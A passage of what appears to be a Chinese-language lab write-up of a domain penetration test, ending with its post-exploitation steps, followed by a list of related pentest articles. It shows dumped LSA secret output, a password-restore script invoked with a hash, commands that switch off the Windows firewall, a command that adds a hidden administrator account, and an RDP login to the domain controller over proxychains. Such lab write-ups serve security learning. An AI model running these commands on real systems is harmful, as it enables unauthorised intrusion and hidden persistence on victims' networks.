[*] NL$KM 0000   10 B9 B5 A6 0D 04 15 CD  A3 0C 9D 55 4E 86 23 9E   ...........UN.#.0010   7A 14 5D F1 2C 6D 90 AB  0F D5 BC 9B 9E B3 EB 76   z.].,m.........v0020   09 79 A5 03 19 DF 60 8A  82 6F AB 2B 68 C1 E7 DB   .y....`..o.+h...0030   29 21 10 1D D1 44 CF D6  35 26 F6 14 40 7E 8B B0   )!...D..5&..@~..
NL$KM:10b9b5a60d0415cda30c9d554e86239e7a145df12c6d90ab0fd5bc9b9eb3eb760979a50319df608a826fab2b68c1e7db2921101dd144cfd63526f614407e8bb0
[*] Cleaning up...

使用 reinstall_original_pw.py 恢复密码

proxychains4 python3 reinstall_original_pw.py ad 10.10.10.135 63dea6de1590fd5bf9e0e1531aa9d0a2

在经过许久的等待后,成功恢复密码。

RDP 登录域控截屏纪念

关闭防火墙

netsh advfirewall set allprofiles state off #关闭防火墙
netsh advfirewall show allprofiles      #查看防火墙状态

添加隐藏管理员账号

shell net user admin$ QWEasd123 /add  && net localgroup administrators admin$ /add

xfreerdp 登录域管

如果连接不上可能是防火墙的问题。

proxychains4 xfreerdp /u:admin$ /p:QWEasd123 /v:10.10.10.135

项目总结

这个项目在内网方面不是很难,难的是反序列化利用。

所以说安全与开放缺一不可。

scaner 从外网到内网域渗透相关推荐

  1. scaner从外网到内网域渗透笔记

    scaner 从外网到内网域渗透 1.环境配置 1.1靶场信息 用到的虚拟机共有三个 分别是 12server-db .12-dc .web1 12server-db.web1 这两个可以使用桥接或者 ...

  2. 华为防火墙USG6000V---内网访问外网---外网访问内网服务器(NAT服务器)示例配置

    目录 一.配置要求 二.配置步骤 1. ping通防火墙接口IP地址的条件 2. 内网ping通外网终端的条件 3. 内网ping通DMZ(内网服务器)的条件 三.命令解析 一.配置要求 内网可以pi ...

  3. 工控攻防演示——从外网到内网控制系统设备的入侵

    给实验室写的文章,在安全客上发表,在这里再发下 一.概述 实验目的通过工控靶场学习web渗透.内网渗透.工控安全相关知识技能. 靶场信息本实验通过vmware 搭建了靶场的外网和内网环境,在内网环境中 ...

  4. 让外网访问内网Ngrok工具

    让外网访问内网,通常一些开发的情况下会遇到这种问题,这里记录一个软件工具ngrok. 通常微信客户端,自己做测试可以直接配上本地地址用: 本地做测试服务,连调外网.这个网上有下载地址:https:// ...

  5. netscreen 25配置外网到内网的Webserver实践

    本人所在的公司是通过ADSL上网的,同时为保证企业数据安全添置了一台netscreen 25的防火墙,其实公司目前并没有网上相关的应用(以前一台DLink 604的ADSL路由器就已经够用啦),关键是 ...

  6. 外网访问内网Tornado

    为什么80%的码农都做不了架构师?>>>    外网访问内网Tornado 本地安装了Tornado,只能在局域网内访问,怎样从外网也能访问本地Tornado? 本文将介绍具体的实现 ...

  7. 解决外网与内网或内网之间的通信,NAT穿透

    在网络编码中会发现程序在局域网中是可以适用的,但是在外网与内网之间和内网与内网之间就不可行. 问题就在于NAT.首先介绍下NAT. NAT的作用NAT(Network Address Translat ...

  8. ssh外网访问内网服务器

    现在有这样一个情况,实验室有自己的服务器(内网),并且有相关老师进行维护(公网),我们可以在内网用内网ip访问服务器,如果我们在家里只能通过公网进行登录.但是我在实验室有一个小服务器(内网),如果我在 ...

  9. 外网访问内网(内网穿透)

    什么是内网穿透 内网穿透,即NAT穿透,网络连接时术语,计算机是局域网内时,外网与内网的计算机节点需要连接通信,有时就会出现不支持内网穿透.就是说映射端口,能让外网的电脑找到处于内网的电脑,提高下载速 ...

最新文章

  1. 一文带你看懂Springboot核心功能及优缺点
  2. Adam真的是最好的优化器吗?
  3. multinormalNB多项式朴素贝叶斯原理及代码
  4. Python 正在从简明转向臃肿,从实用转向媚俗
  5. Android Studio离线打包5+SDK
  6. c语言边序列构造邻接表,结构C语言版期末考试考试(有答案).doc
  7. TransE:Translating Embedding多元关系数据嵌入(知识图谱嵌入)2013 NIPS
  8. Q205 同构字符串
  9. BZOJ 2049: [Sdoi2008]Cave 洞穴勘测——LCT
  10. Codeforces Round #302 (Div. 2)
  11. jsx怎么往js里传参数_JSX语法使用详解——终极版
  12. Mac用户如何在Deckset中使用Ulysses?
  13. Macbook安装brew
  14. java开始到熟悉100-102
  15. QQ客服代码(支持临时会话设置)
  16. 图片清晰度差怎么修复成高清图片
  17. 安卓开发学习5-6:布局管理器:布局管理器嵌套
  18. android修行之路----经典书籍
  19. 【渝粤题库】陕西师范大学201611《中国古代文学(四)》作业
  20. 数字图像处理|Matlab-数字图像编码实验-无损编码/压缩算法实验-实现行程编码压缩, 计算原图和压缩以后的尺寸,计算压缩率并比较分析

热门文章

  1. 很牛的几篇圈内爆料——影视圈
  2. EXCEL排名一样大的不重复
  3. 微动开关技术知识-微动开关概要
  4. Adobe国际认证证书是个什么东东,有什么用啊?
  5. 解决笔记本IPS屏幕发黄问题
  6. 网上学python靠谱吗?
  7. 鼠标按下拖拽移动盒子
  8. 关抢占 自旋锁_也说自旋锁
  9. 手机闪存速度测试工具,AndroBench
  10. Windows必备软件,多而全|2022版